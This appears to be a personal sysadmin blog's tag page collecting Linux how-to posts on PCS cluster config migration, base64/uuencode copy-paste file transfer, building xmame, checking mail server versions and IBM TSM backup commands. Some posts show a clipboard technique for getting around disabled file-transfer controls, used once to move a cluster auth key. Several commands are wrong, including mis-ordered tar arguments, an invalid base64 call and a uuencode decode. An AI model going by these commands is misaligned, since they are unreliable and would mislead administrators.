Posts Tagged ‘tar’

How to create PCS / Corosync High Availability Cluster config backup and migrate to new Virtual Machines

Thursday, October 26th, 2023

pcs-pcmk-internals-explained-picture

The aim of this article is to illustrate how to literally migrate a an Haproxy PCS Pacemaker / Corosync Cluster configurations from old Virtual Machines that due to time passed become unsupported (The Operating System end of life (EOF)) has reached to a new ones. 
This is quite a complex task especially as you usually need to setup the Hypervisor hosts with VMWare / Xen / KVM / OpenVZ or whatever kind of virtualization is to be used. Then setup the correct network interfaces IPs failover the heartbeat lines over which the cluster will work to prevent Split Brain scenartions, the Network Bonding interfaces to guarantee a higher amount of higher availability as well as physically install and update all the cluster software on the new built Linux hosts that will be members of the new cluster in setup. 

All this configuration from scratch of a PCS Corosync cluster is a very lenght topic which I'll try to cover in some of my next articles. In short to migrate the cluster from old machines to new once all this predescribed steps are in line. 
You will need to.


1. Create backup of old cluster configuration
2. Migrate the backup to a new built VM Machine hosts
3. Import the cluster configuration into the PCS Cluster.


Bear in mind that this article discusses a migration of CentOS Linux release 7.9.2009 with its shipped versions of corosync / pacemaker and pcs 

How to create cluster config backup and migrate to new VM

1. Dump cluster assuming that is a Quality Assuare or Pre – Production host  to create full cluster config backup

[root@old-cluster-machine ~]# pcs config backup old-cluster-machine.pcs.config.bak

2. Dump cluster Production full configuration

[root@old-cluster-machine1 ~]# pcs config backup old-cluster-machine1.pcs.config.bak

This command will output a backup of 

old-cluster-machine1.pcs.config.bak.tar.bz2

3. Migrate a cluster identical config to the new Virtual machines

Usually this moval of produced backup files with pcs config backup  commands can be copied with something like FTP / SFTP  or SSL-ed / TLS-ed protocol. However if you have to move the configuration files from a paranoid Citrix environment that doesn't allow you to have any SFTP / SSH or FTP kind of transfer protocol from the location where the old config lays to the new ones. 
A simple encoding of the binary format dumped configuration to plain text files can be done and files, can be moved via a simple copy / paste operation (a bit of a hack) 🙂

Encode the cluster config to be able to migrate configuration in plain text via a simple Copy / Paste operation.

 

[root@old-cluster-machine ~]# base64 config backup old-cluster-machine.pcs.config.bak > old-cluster-machine.pcs.config.bak.tgz.b64

[root@old-cluster-machine1 ~]# base64 old-cluster-machine1.pcs.config.bak.tar.bz2 > old-cluster-machine1.pcs.config.bak.tgz.b64
[root@old-cluster-machine ~]# cat  old-cluster-machine.pcs.config.bak.tgz.b64

(Copy output and Paste to new host VM) /root/haproxy-cluster-backup)

[root@old-cluster-machine1 ~]# cat old-cluster-machine1.pcs.config.bak.tgz.b64 


(Copy output and Paste to new host VM) /root/haproxy-cluster-backup)

Login to the new hosts, where configs has to be migrated and restore the files with base64

For QA / Preprod to restore backup config

[root@dkv-newqa-vm ~]# mkdir /root/haproxy-cluster-backup
[root@dkv-newqa-vm ~]# cd /root/haproxy-cluster-backup
[root@dkv-newqa-vm ~]# base64 -d old-cluster-machine.config.bak.tgz.b64 > old-cluster-machine.pcs.config.bak.tar.bz2
[root@dkv-newqa-vm ~]#  tar -jxvf old-cluster-machine.pcs.config.bak.tar.bz2
ak.tar.bz2
version.txt
pcs_settings.conf
corosync.conf
cib.xml
pacemaker_authkey
uidgid.d/

 

For Prod to restore backup config

[root@dkv-newprod-vm  ~]# mkdir /root/haproxy-cluster-backup
[root@dkv-newprod-vm ~]# cd /root/haproxy-cluster-backup
[root@dkv-newprod-vm ~]# base64 -d old-cluster-machine.config.bak.tgz.b64 > old-cluster-machine1.pcs.config.bak.tar.bz2
ak.tar.bz2
version.txt
pcs_settings.conf
corosync.conf
cib.xml
pacemaker_authkey
uidgid.d/


N!B! An Useful hin is on RHEL 8 Linux's shipped pcs command version has also a very useful command with which you can simply dump completly the config of the cluster in straight commands which you can run directly on the new VM machines where you have migrated.

The command to print out commands that would add existing cluster resources on Redhat 8:

# pcs resource config –output-format=cmd

Another useful command for cluster migration is cibadmin

i.e. to dump cluster xml config

#cibadmin –q > cluster.xml

Later you can import the prior xml dump with it.

# cibadmin –replace –xml-file cib.xml

 

How to move transfer binary files encoded with base64 on Linux with Copy Paste of text ASCII encoded string

Monday, October 25th, 2021

base64-encode-decode-binary-files-to-transfer-between-servers-base64-artistic-logo

If you have to work on servers in a protected environments that are accessed via multiple VPNs, Jump hosts or Web Citrix and you have no mean to copy binary files to your computer or from your computer because you have all kind of FTP / SFTP or whatever Data Copy clients disabled on remote jump host side or CITRIX server and you still are looking for a way to copy files between your PC and the Remote server Side.
Or for example if you have 2 or more servers that are in a special Demilitarized Network Zones ( DMZ ) and the machines does not have SFTP / FTP / WebServer or other kind of copy protocol service that can be used to copy files between the hosts and you still need to copy some files between the 2 or more machines in a slow but still functional way, then you might not know of one old school hackers trick you can employee to complete the copy of files between DMZ-ed Server Host A lets say with IP address (192.168.50.5) -> Server Host B (192.168.30.7). The way to complete the binary file copy is to Encode the binary on Server Host A and then, use cat  command to display the encoded string and copy whole encoded cat command output  to your (local PC buffer from where you access the remote side via SSH via the CITRIX or Jump host.). Then decode the encoded file with an encoding tool such as base64 or uuencode. In this article, I'll show how this is done with base64 and uuencode. Base64 binary is pretty standard in most Linux / Unix OS-es today on most Linux distributions it is part of the coreutils package.
The main use of base64 encoding to encode non-text Attachment files to Electronic Mail, but for our case it fits perfectly.
Keep in mind, that this hack to copy the binary from Machine A to Machine B of course depends on the Copy / Paste buffer being enabled both on remote Jump host or Citrix from where you reach the servers as well as your own PC laptop from where you access the remote side.

base64-character-encoding-string-table

Base64 Encoding and Decoding text strings legend

The file copy process to the highly secured PCI host goes like this:
 

1. On Server Host A encode with md5sum command

[root@serverA ~]:# md5sum -b /tmp/inputbinfile-to-encode
66c4d7b03ed6df9df5305ae535e40b7d *inputbinfile-to-encode

 

As you see one good location to encode the file would be /tmp as this is a temporary home or you can use alternatively your HOME dir

but you have to be quite careful to not run out of space if you produce it anywhere 🙂

 

2. Encode the binary file with base64 encoding

 [root@serverB ~]:# base64 -w0 inputbinfile-to-encode > outputbin-file.base64

The -w0 option is given to disable line wrapping. Line wrapping is perhaps not needed if you will copy paste the data.

base64-encoded-binary-file-text-string-linux-screenshot

Base64 Encoded string chunk with line wrapping

For a complete list of possible accepted arguments check here.

3. Cat the inputbinfile-to-encode just generated to display the text encoded file in your SecureCRT / Putty / SuperPutty etc. remote ssh access client

[root@serverA ~]:# cat /tmp/inputbinfile-to-encode
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAMGEAAAAAAABAAAAAAAAAACgXAgAAAAAAAAAAA
EAAOAALAEAAHQAcAAYAAAAEAAA ……………………………………………………………… cTD6lC+ViQfUCPn9bs

 

4. Select the cat-ted string and copy it to your PC Copy / Paste buffer


If the bin file is not few kilobytes, but few megabytes copying the file might be tricky as the string produced from cat command would be really long, so make sure the SSH client you're using is configured to have a large buffer to scroll up enough and be able to select the whole encoded string until the end of the cat command and copy it to Copy / Paste buffer.

 

5. On Server Host B paste the bas64 encoded binary inside a newly created file

Open with a text editor vim / mc or whatever is available

[root@serverB ~]:# vi inputbinfile-to-encode

Some very paranoid Linux / UNIX systems might not have even a normal text editor like 'vi' if you happen to need to copy files on such one a useful thing is to use a simple cat on the remote side to open a new File Descriptor buffer, like this:

[root@server2 ~]:# cat >> inputbinfile-to-encode <<'EOF'
Paste the string here

 

6. Decode the encoded binary with base64 cmd again

[root@serverB ~]:# base64 –decode outputbin-file.base64 > inputbinfile-to-encode

 

7. Set proper file permissions (the same as on Host A)

[root@serverB ~]:#  chmod +x inputbinfile-to-encode

 

8. Check again the binary file checksum on Host B is identical as on Host A

[root@serverB ~]:# md5sum -b inputbinfile-to-encode
66c4d7b03ed6df9df5305ae535e40b7d *inputbinfile-to-encode

As you can md5sum match on both sides so file should be OK.

 

9. Encoding and decoding files with uuencode


If you are lucky and you have uuencode installed (sharutils) package is present on remote machine to encode lets say an archived set of binary files in .tar.gz format do:

Prepare the archive of all the files you want to copy with tar on Host A:

[root@Machine1 ~]:#  tar -czvf /bin/whatever /usr/local/bin/htop /usr/local/bin/samhain /etc/hosts archived-binaries-and-configs.tar.gz

[root@Machine1 ~]:# uuencode archived-binaries-and-configs.tar.gz archived-binaries-and-configs.uu

Cat / Copy / paste the encoded content as usual to a file on Host B:

Then on Machine 2 decode:

[root@Machine2 ~]:# uuencode -c < archived-binaries-and-configs.tar.gz.uu

 

Conclusion


In this short method I've shown you a hack that is used often by script kiddies to copy over files between pwn3d machines, a method which however is very precious and useful for sysadmins like me who has to admin a paranoid secured servers that are placed in a very hard to access environments.

With the same method you can encode or decode not only binary file but also any standard input/output file content. base64 encoding is quite useful stuff to use also in bash scripts or perl where you want to have the script copy file in a plain text format . Datas are encoded and decoded to make the data transmission and storing process easier. You have to keep in mind always that Encoding and Decoding are not similar to encryption and decryption as encr. deprytion gives a special security layers to the encoded that. Encoded data can be easily revealed by decoding, so if you need to copy between the servers very sensitive data like SSL certificates Private RSA / DSA key, this command line utility tool better to be not used for sesitive data copying.

 

 

How to Install and Play old Arcade Multiple Arcade Machine Emulator Games on Linux in 2021 with xmame and GXMame GUI Frontend

Friday, May 14th, 2021

mame-multiple-arcade-machine-emulator
I've earlier blogged on how to install and play old arcade games with xmame compiled from source on the now old Debian 7 Linux under the article Install xmame from source on Debian Linux 7.0 (Wheezy) to play for better MAME (Arcade Games Emulation)
as well article on using the newer version of MAME emulator instead of xmame under the article Playing Arcade old school games on Debian Linux as well as how to make the MAME emulator work with a joystick see my previous How to configure Joystick ( Gamepad ) on Debian, Ubuntu, Mint GNU / Linux easily.

Since I have preinstalled my notebook with fresh Debian 10 Buster, for a long time I did not have the time as well as desire to play my favourite games of the youth to name a few this is Xain'd Sleena / Cadillacs and Dinosaurs (1993) / the Punisher (1993) / Captain Commando (1991) / Super Mario / Contra / Final Fight etc. and rest of the the SEGA Mega Drive / GameBoy / Nintendo / Terminator game (fake clone of nintendo) and other killing Arcade Classics of the late 90s and early year 2000, which we played on a public houses on a game cabinets with a joysticks. 
Hence I tried to reproduce some of my articles just as of 2021 to see whether still we can get a nice playable MAME emulator on Linux with a Graphical GUI for Mate or GNOME. And it seems using a straight mame out of Debian standard repositories did not work with some of the more sophisticated ROM .zip files from the nices such as Punisher or XSLEENA.zip, this is how this article got born in an attempt to give a way for such old school game freaks as me to be able to play there favorite games of the youth.

Below is the few steps adapted mostly from above articles with some head banging and loosing multiple hours wondering until I finally got a working XMAME ROM emulator with the simple but working GXMAME graphical frontend for M.A.M.E..

To compile xmame with joystick support be it analog or whatever joystick you have to use a Makefile like below

https://www.pc-freak.net/files/xmame-0.103-Makefile-for-joystick

Copy it on your PC and remove it to Makefile in the xmame-0.103 source dir:

# cd /usr/local/src/xmame-0.103


I have to install all the necessery package dependencies development header files, some of which are mentioned in the beginning of post articles and some of which I had to install manually, such as the preset Debian meta-package build-essentials Things to install on newly installed GNU / Linux (My favourite must have Linux text and GUI programs missing in fresh Linux installs), just to mention a few I remember had to install based on some compilation errors:

# apt-get install build-essential
# apt-get install –yes zlib1g-dev

# apt-get install –yes libexpat1-dev
# apt-get install –yes libghc-x11-dev
# apt-get install –yes x11proto-video-dev
# apt-get install –yes libxv-dev
# apt-get install libxext6
# apt-get install libxext6-dev
# apt-get install libxext-dev
# apt-get install libjpeg62-turbo-dev
# apt-get install libxinerama-dev
# apt-get install libgtk-3-dev
# apt-get install syslog-ng-dev
# apt-get install libgtk2.0-dev


If I'm missing some package necessery here you will have to find it yourself based on the *.h file produced as error during compile you should look it up with a cmd like:

# apt-file search glib2.h


And install it further.

You will need to edit Makefile or take and straight use or if necessery adapt an already prepared Makefile for my purpose:
 

# wget https://www.pc-freak.net/files/xmame-0.103-Makefile-for-joystick;
# mv https://www.pc-freak.net/files/xmame-0.103-Makefile-for-joystick Makefile
# make && make install


Some .zip roms does not properly work with the newer mame you need to instead use xmame ..

Below is the version I use on Debian 10 as of May 2021 year.

hipo@jeremiah:/usr/local/src$ xmame –version
GLINFO: loaded OpenGL library libGL.so!
GLINFO: loaded GLU    library libGLU.so!
xmame (x11) version 0.103 (May 13 2021)


To make the joystick work in xmame you will need to have a preset of modules loaded on the Linux for my old Genius joystick this is what works.

hipo@jeremiah:~/Games$ cat /etc/modules
# /etc/modules: kernel modules to load at boot time.
#
# This file contains the names of kernel modules that should be loaded
# at boot time, one per line. Lines beginning with "#" are ignored.
snd-seq
3c59x
snd-emu10k1
snd-pcm-oss
snd-mixer-oss
snd-seq-oss
joydev
ns558
sidewinder
gameport
analog
adi
pcigame
iforce
evdev
usbhid


Fill in your joystick module there and make sure you manually load each one of the modules with modprobe command.
Next calibrate the joystick with some tool like jktest-gtk

jktest-gtk-linux-screenshot
If you need a good frontend for MATE / GNOME for xmame try gxmame. It is a real pain in the ass to configure, note that the only working version of xmame with good configuration as well as gxmame with a game list that is prebuild.
If you need xmame-0.103.tar.bz2 exact xmame version I'm using thethe archive is on:

https://www.pc-freak.net/files/xmame-0.103.tar.bz2
An old bundle of both gxmame and xmamerc configs is here

https://www.pc-freak.net/files/xmame.tar.gz

https://www.pc-freak.net/files/xmame-config-for-joystick-hipo.tar.gz
For example my old working version of xmame ~/.xmame is here https://www.pc-freak.net/files/xmame-config-for-joystick-hipo.tar.gz

Configuration of gxmame (even though it has has a GUI for configuring is below:

https://www.pc-freak.net/files/gxmame.tar.gz

xmamerc sample working file is here

https://www.pc-freak.net/files/xmamerc

My newest current version as of Debian 10 Squeeze of xmame and gxmame is below:

https://www.pc-freak.net/files/gxmame-config-newest_may_2021.tar.gz

https://www.pc-freak.net/files/xmame-config-newest_may_2021.tar.gz

Note that my rom files and stuff is located and configured in neewst configs to be under /home/hipo/Games/roms/ if your location is others grep it in .xmame/* and .gxmame/* files and set the correct PATH locations.

A VERY IMPORTANT NOTE is not to use the stable version of GXMAME even though it worked in 2003 fine as the project is abandoned and unsupported as of 2021 the latest downloadable stable gxmame file on Sourceforge gxmame-0.34b website is not working correctly (even though it compiles fine).
You have to compile and use instead the newer version gxmame-0.35beta1.

If you want to use gxmame with a joystick you need to compile it with the respective option:
 

root@jeremiah:/usr/local/src/gxmame-0.35beta1# ./configure –enable-joystick

 

gxmame 0.35beta1

Print debugging messages…… : no
Joystick support………….. : yes

GXMame will be installed in /usr/local/bin.
Warning: You have an old copy of gxmame at /usr/local/bin/gxmame.

 

configure complete, now type 'make'

To install compiled binaries do the usual:
 

# make && make install

gxmame binary should be installed under /usr/local/bin/gxmame once launched you should get the shiny gxmame GUI.

gxmame-screenshot-debian-10-gnu-linux-mate-desktop

Perhaps there was other stuff I've done in the process I forgot to document here, so if you try to follow my guide and something does not work please tell me what I'm missing and you can't handle it either contact me.

The guide is for Debian Linux but should work on other .Deb based Linux distros such as Ubuntu / Linux Mint etc.

To enjoy my 4GB present of ROM files containing many of best well known M.A.M.E. ARCADE GAMES check archive here. Note that this collection was downloaded on the Internet and I do not hold any responsibility of the archive. If it contains files with any copyright infringment this is to be on your own.
 

How to check version of most used mail servers Postfix / Qmail / Exim / Sendmail

Wednesday, October 14th, 2020

How to check version of a Linux host's installed Mail server?

Most used mail servers Postfix / Qmail / Exim / Sendmail and usually you have to do a dpkg -l / rpm -qa or whatever package manager to get the package version. But sometimes the package is built to have a different naming convention from the actual installed MTA.

As recently I had to check on a Linux host what kind of version was the installed and used one to the SMTP, below is how to find conrete versions of Postfix / Qmail / Exim / Sendmail.
If none of the 4 is installed and something more cryptic like ssmtp is installed if another one is installed perhaps the best way would be to check with lsof -i :25 command and see  what process has binded and listens on TCP port 25.

mail-server-lsof-linux-screenshot-qmail-vpopmail

 

 

1. How to check Postfix exact mail server version

mail-server-exim-check-lsof-screenshot

Once you can find Postfix is the Network listening MTA, you might think you can simply use postfix -v however, but no …
Unlike many other applications, Postfix has no -v or –versions switch. But you can get the version information easily by using the postconf command as shown below:

root@server :~# postconf mail_version

postfix-show-version-postconf-linux

Other approach is to dump all postfix configuration settings (this is useful to get more info on how postfix is configured) and explicitly grep for the version.
 How to check version of a Linux host's installeded webserver?

root@server :~# postconf -d | grep mail_version

 

2. How to check Exim MTA running version ?

root@exim-mail :/ # exim -bV
Exim version 4.72 #1 built 13-Jul-2010 21:54:55
Copyright (c) University of Cambridge, 1995 – 2007
Berkeley DB: Sleepycat Software: Berkeley DB 4.3.29: (September 19, 2009)
Support for: crypteq iconv() Perl OpenSSL move_frozen_messages Content_Scanning DKIM Old_Demime
Lookups: lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmnz
Authenticators: cram_md5 plaintext spa
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore/mbx autoreply lmtp pipe smtp
Size of off_t: 8
OpenSSL compile-time version: OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
OpenSSL runtime version: OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
Configuration file is /etc/exim.conf

how-to-get-exim-version-on-gnu-linux-screenshot


3. How to check Sendmail Mail Transport Agent exact Mail version ?

Though sendmail is rarely used this days and it usually works mostly on obsolete old scrap hosts
or in some old fashioned conservative organizations such as Banks and Payment services providers, you might need to invertise it, just like the configuration m4 format complexity with its annoying macros, getting the version is also not straight forward:

# sendmail -d0.4 -bv root | grep Version
Version 8.14.4

Above commands should be working on most Linux distributions such as Debian / Ubuntu / Fedora / CentOS / SuSE and other Linux derivatives
 

4. How to check Qmail MTA version?

This is a bit of complicated question, as Qmail's base has not been significantly changed for years.
The latest published qmail package is qmail-1.03.tar.gz.  1.03 was released in 1998, Qmail is famous for its unbreakable security. The author of qmail  Daniel J. Bernstein is famous for writting Qmail to make the work installation and configuration of SMTP simple as of the time of writting sendmail was the defacto standard and sendmail was hard to configure.
Also sendmail was famous for a set of Security holes that got a lot of Sendmail MTA's on the Net got hacked. Thus the QMAIL was written as a more security-aware mail transport agent.

In contrast to sendmail, qmail has a modular architecture composed of mutually untrusting components; for instance, the SMTP listener component of qmail runs with different credentials from the queue manager or the SMTP sender. qmail was also implemented with a security-aware replacement to the C standard library, and as a result has not been vulnerable to stack and heap overflows, format string attacks, or temporary file race conditions.

The core qmail package has not been updated for many years. New features were initially provided by third party patches, from which the most important at the time were brought together in a single meta-patch set called netqmail.

The current version of netqmail is at 1.06 netqmail-1.06.tar.gz as of year 2020.

One possible way to get some info about installed qmail or components is to use the documentation look up command apropos

qmail:~# apropos qmail


or check the manual or at worst check for the installation source files that the person that installed the qmail used 🙂

A fun fact about qmail few might know is D. Bernstein offered in 1997 a US$500 reward for the first person to publish a verifiable security hole in the latest version of the software, for many years till 2005 no hole was found security researcher Georgi Guninski found an integer overflow in qmail. On 64-bit platforms, in default configurations with sufficient virtual memory, the delivery of huge amounts of data to certain qmail components may allow remote code execution. Bernstein disputes that this is a practical attack, arguing that no real-world deployment of qmail would be susceptible. Configuration of resource limits for qmail components mitigates the vulnerability.

On November 1, 2007, Bernstein raised the reward to US$1000. At a slide presentation the following day, Bernstein stated that there were 4 "known bugs" in the ten-year-old qmail-1.03, none of which were "security holes." He characterized the bug found by Guninski as a "potential overflow of an unchecked counter." "Fortunately, counter growth was limited by memory and thus by configuration, but this was pure luck.

5. Quick way to check the type of Mail server installed on Debian based Linux that doesn't have telnet installed


As you know simple telnet localhost 25 or a simple ps -ef could reveal at most times general information on the installed server. However there is another way to do it using package manager. by using embedded bash shell type type command like so:
 

# type -p sendmail |
xargs dpkg -S

type-x-bash-command-to-find-out-email-server-version-on-linux

Another hacky way to check whether exim, postfix or sendmail SMTP is installed is with:

hipo@freak:~$ echo $(man sendmail)| grep "exim"|wc -l
1
hipo@freak:~$ echo $(man sendmail)| grep "postfix"|wc -l
0
hipo@freak:~$ echo $(man sendmail)| grep "sendmail"|wc -l
0

I guess there are nice hacks and ways to get versions, so if you're aware of any please share with me.
Enjoy !

IBM TSM dsmc console client use for listing configured backups, checking set scheduled backups and backup and restore operations howto

Friday, March 6th, 2020

tsm-ibm-logo_tivoli-dsmc-console-client-listing-backups-create-backups-and-restore-on-linux-unix-windows

Creating a simple home based backup solution with some shell scripting and rsync is a common use. However as a sysadmin in a middle sized or large corporations most companies use some professional backup service such as IBM Tivoli Storage Manager TSM – recently IBM changed the name of the product to IBM Spectrum.

IBM TSM  is a data protection platform that gives enterprises a single point of control and administration for backup and recovery that is used for Privare Clouds backup and other high end solutions where data criticality is top.
Usually in large companies TSM backup handling is managed by a separate team or teams as managing a large TSM infrastructure is quite a complex task, however my experience as a sysadmin show me that even if you don't have too much of indepth into tsm it is very useful to know how to manage at least basic Incremental backup operations such as view what is set to be backupped, set-up a new directory structure for backup, check the backup schedule configured, check what files are included and which excluded from the backup store etc. 

TSM has multi OS support ans you can use it on most streamline Operating systems Windows / Mac OS X and Linux in this specific article I'll be talking concretely about backing up data with tsm on Linux, tivoli can be theoretically brought up even on FreeBSD machines via the Linuxemu BSD module and the 64-Bit Tivoli Storage Manager RPMs.
Therefore in this small article I'll try to give few useful operations for the novice admin that stumbles on tsm backupped server that needs some small maintenance.
 

1. Starting up the dsmc command line client

 

Nomatter the operating system on which you run it to run the client run:

# dsmc

 

tsm-check-backup-schedule-set-time

Note that usually dsmc should run as superuser so if you try to run it via a normal non-root user you will get an error message like:

 

[ user@linux ~]$ dsmc
ANS1398E Initialization functions cannot open one of the Tivoli Storage Manager logs or a related file: /var/tsm/dsmerror.log. errno = 13, Permission denied

 

Tivoli SM has an extensive help so to get the use basics, type help
 

tsm> help
1.0 New for IBM Tivoli Storage Manager Version 6.4
2.0 Using commands
  2.1 Start and end a client command session
    2.1.1 Process commands in batch mode
    2.1.2 Process commands in interactive mode
  2.2 Enter client command names, options, and parameters
    2.2.1 Command name
    2.2.2 Options
    2.2.3 Parameters
    2.2.4 File specification syntax
  2.3 Wildcard characters
  2.4 Client commands reference
  2.5 Archive
  2.6 Archive FastBack

Enter 'q' to exit help, 't' to display the table of contents,
press enter or 'd' to scroll down, 'u' to scroll up or
enter a help topic section number, message number, option name,
command name, or command and subcommand:    

 

2. Listing files listed for backups

 

A note to make here is as in most corporate products tsm supports command aliases so any command supported described in the help like query, could be
abbreviated with its first letters only, e.g. query filespace tsm cmd can be abbreviated as

tsm> q fi

Commands can be run non-interactive mode also so if you want the output of q fi you can straight use:

tsm> dsmc q fi

 

tsm-check-included-excluded-files-q-file-if-backupped-list-backup-set-directories

This shows the directories and files that are set for backup creation with Tivoli.

 

3. Getting included and excluded backup set files

 

It is useful to know what are the exact excluded files from tsm set backup this is done with query inclexcl

tsm-check-excluded-included-files

 

4. Querying for backup schedule time

Tivoli as every other backup solution is creating its set to backup files in a certain time slot periods. 
To find out what is the time slot for backup creation use;

tsm> q sched
Schedule Name: WEEKLY_ITSERV
      Description: ITSERV weekly incremental backup
   Schedule Style: Classic
           Action: Incremental
          Options: 
          Objects: 
         Priority: 5
   Next Execution: 180 Hours and 35 Minutes
         Duration: 15 Minutes
           Period: 1 Week  
      Day of Week: Wednesday
            Month:
     Day of Month:
    Week of Month:
           Expire: Never  

 

tsm-query-partitions-backupeed-or-not

 

5. Check which files have been backed up

If you want to make sure backups are really created it is a good to check, which files from the selected backup files have already
a working backup copy.

This is done with query backup like so:

tsm> q ba /home/*

 

tsm-dsmc-query-user-home-for-backups

If you want to query all the current files and directories backed up under a directory and all its subdirectories you need to add the -subdir=yes option as below:

 

tsm> q ba /home/hipo/projects/* -subdir=yes
   
Size      Backup Date        Mgmt Class A/I File
   —-      ———–        ———- — —-
    512  12-09-2011 19:57:09    STANDARD    A  /home/hipo/projects/hfs0106
  1,024  08-12-2011 02:46:53    STANDARD    A  /home/hipo/projects/hsm41perf
    512  12-09-2011 19:57:09    STANDARD    A  /home/hipo/projects/hsm41test
    512  24-04-2012 00:22:56    STANDARD    A  /home/hipo/projects/hsm42upg
  1,024  12-09-2011 19:57:09    STANDARD    A  /home/hipo/projects/hfs0106/test
  1,024  12-09-2011 19:57:09    STANDARD    A  /home/hipo/projects/hfs0106/test/test2
 12,048  04-12-2011 02:01:29    STANDARD    A  /home/hipo/projects/hsm41perf/tables
 50,326  30-04-2012 01:35:26    STANDARD    A  /home/hipo/projects/hsm42upg/PMR70023
 50,326  27-04-2012 00:28:15    STANDARD    A  /home/hipo/projects/hsm42upg/PMR70099
 11,013  24-04-2012 00:22:56    STANDARD    A  /home/hipo/projects/hsm42upg/md5check  

 

  • To make tsm, backup some directories on Linux / AIX other unices:

 

tsm> incr /  /usr  /usr/local  /home /lib

 

  • For tsm to backup some standard netware drives, use:

 

tsm> incr NDS:  USR:  SYS:  APPS:  

 

  • To backup C:\ D:\ E:\ F:\ if TSM is running on Windows

 

tsm> incr C:  D:  E: F:  -incrbydate 

 

  • To back up entire disk volumes irrespective of whether files have changed since the last backup, use the selective command with a wildcard and -subdir=yes as below:

 

tsm> sel /*  /usr/*   /home/*  -su=yes   ** Unix/Linux

 

7. Backup selected files from a backup location

 

It is intuitive to think you can just add some wildcard characters to select what you want
to backup from a selected location but this is not so, if you try something like below
you will get an err.

 

tsm> incr /home/hipo/projects/*/* -su=yes      
ANS1071E Invalid domain name entered: '/home/hipo/projects/*/*'


The proper way to select a certain folder / file for backup is with:

 

tsm> sel /home/hipo/projects/*/* -su=yes

 

8. Restoring tsm data from backup

 

To restore the config httpd.conf to custom directory use:

 

tsm> rest /etc/httpd/conf/httpd.conf  /home/hipo/restore/

 

N!B! that in order for above to work you need to have the '/' trailing slash at the end.

If you want to restore a file under a different name:

 

tsm> rest /etc/ntpd.conf  /home/hipo/restore/

 

9. Restoring a whole backupped partition

 

tsm> rest /home/*  /tmp/restore/ -su=yes

 

This is using the Tivoli 'Restoring multiple files and directories', and the files to restore '*'
are kept till the one that was recovered (saying this in case if you accidently cancel the restore)

 

10. Restoring files with back date 

 

By default the restore function will restore the latest available backupped file, if you need
to recover a specific file, you need the '-inactive' '-pick' options.
The 'pick' interface is interactive so once listed you can select the exact file from the date
you want to restore.

General restore command syntax is:
 

tsm> restore [source-file] [destination-file]

 


tsm> rest /home/hipo/projects/*  /tmp/restore/ -su=yes  -inactive -pick

TSM Scrollable PICK Window – Restore

     #    Backup Date/Time        File Size A/I  File
   ————————————————————————————————–
   170. | 12-09-2011 19:57:09        650  B  A   /home/hipo/projects/hsm41test/inclexcl.test
   171. | 12-09-2011 19:57:09       2.74 KB  A   /home/hipo/projects/hsm41test/inittab.ORIG
   172. | 12-09-2011 19:57:09       2.74 KB  A   /home/hipo/projects/hsm41test/inittab.TEST
   173. | 12-09-2011 19:57:09       1.13 KB  A   /home/hipo/projects/hsm41test/md5.out
   174. | 30-04-2012 01:35:26        512  B  A   /home/hipo/projects/hsm42125upg/PMR70023
   175. | 26-04-2012 01:02:08        512  B  I   /home/hipo/projects/hsm42125upg/PMR70023
   176. | 27-04-2012 00:28:15        512  B  A   /home/hipo/projects/hsm42125upg/PMR70099
   177. | 24-04-2012 19:17:34        512  B  I   /home/hipo/projects/hsm42125upg/PMR70099
   178. | 24-04-2012 00:22:56       1.35 KB  A   /home/hipo/projects/hsm42125upg/dsm.opt
   179. | 24-04-2012 00:22:56       4.17 KB  A   /home/hipo/projects/hsm42125upg/dsm.sys
   180. | 24-04-2012 00:22:56       1.13 KB  A   /home/hipo/projects/hsm42125upg/dsmmigfstab
   181. | 24-04-2012 00:22:56       7.30 KB  A   /home/hipo/projects/hsm42125upg/filesystems
   182. | 24-04-2012 00:22:56       1.25 KB  A   /home/hipo/projects/hsm42125upg/inclexcl
   183. | 24-04-2012 00:22:56        198  B  A   /home/hipo/projects/hsm42125upg/inclexcl.dce
   184. | 24-04-2012 00:22:56        291  B  A   /home/hipo/projects/hsm42125upg/inclexcl.ox_sys
   185. | 24-04-2012 00:22:56        650  B  A   /home/hipo/projects/hsm42125upg/inclexcl.test
   186. | 24-04-2012 00:22:56        670  B  A   /home/hipo/projects/hsm42125upg/inetd.conf
   187. | 24-04-2012 00:22:56       2.71 KB  A   /home/hipo/projects/hsm42125upg/inittab
   188. | 24-04-2012 00:22:56       1.00 KB  A   /home/hipo/projects/hsm42125upg/md5check
   189. | 24-04-2012 00:22:56      79.23 KB  A   /home/hipo/projects/hsm42125upg/mkreport.020423.out
   190. | 24-04-2012 00:22:56       4.27 KB  A   /home/hipo/projects/hsm42125upg/ssamap.020423.out
   191. | 26-04-2012 01:02:08      12.78 MB  A   /home/hipo/projects/hsm42125upg/PMR70023/70023.tar
   192. | 25-04-2012 16:33:36      12.78 MB  I   /home/hipo/projects/hsm42125upg/PMR70023/70023.tar
        0———10——–20——–30——–40——–50——–60——–70——–80——–90–
<U>=Up  <D>=Down  <T>=Top  <B>=Bottom  <R#>=Right  <L#>=Left
<G#>=Goto Line #  <#>=Toggle Entry  <+>=Select All  <->=Deselect All
<#:#+>=Select A Range <#:#->=Deselect A Range  <O>=Ok  <C>=Cancel
pick> 


To navigate in pick interface you can select individual files to restore via the number seen leftside.
To scroll up / down use 'U' and 'D' as described in the legenda.

 

11. Restoring your data to another machine

 

In certain circumstances, it may be necessary to restore some, or all, of your data onto a machine other than the original from which it was backed up.

In ideal case the machine platform should be identical to that of the original machine. Where this is not possible or practical please note that restores are only possible for partition types that the operating system supports. Thus a restore of an NTFS partition to a Windows 9x machine with just FAT support may succeed but the file permissions will be lost.
TSM does not work fine with cross-platform backup / restore, so better do not try cross-platform restores.
 Trying to restore files onto a Windows machine that have previously been backed up with a non-Windows one. TSM created backups on Windows sent by other OS platforms can cause  backups to become inaccessible from the host system.

To restore your data to another machine you will need the TSM software installed on the target machine. Entries in Tivoli configuration files dsm.sys and/or dsm.opt need to be edited if the node that you are restoring from does not reside on the same server. Please see our help page section on TSM configuration files for their locations for your operating system. 

To access files from another machine you should then start the TSM client as below:

 

# dsmc -virtualnodename=RESTORE.MACHINE      


You will then be prompted for the TSM password for this machine.

 

You will probably want to restore to a different destination to the original files to prevent overwriting files on the local machine, as below:

 

  • Restore of D:\ Drive to D:\Restore ** Windows 

 

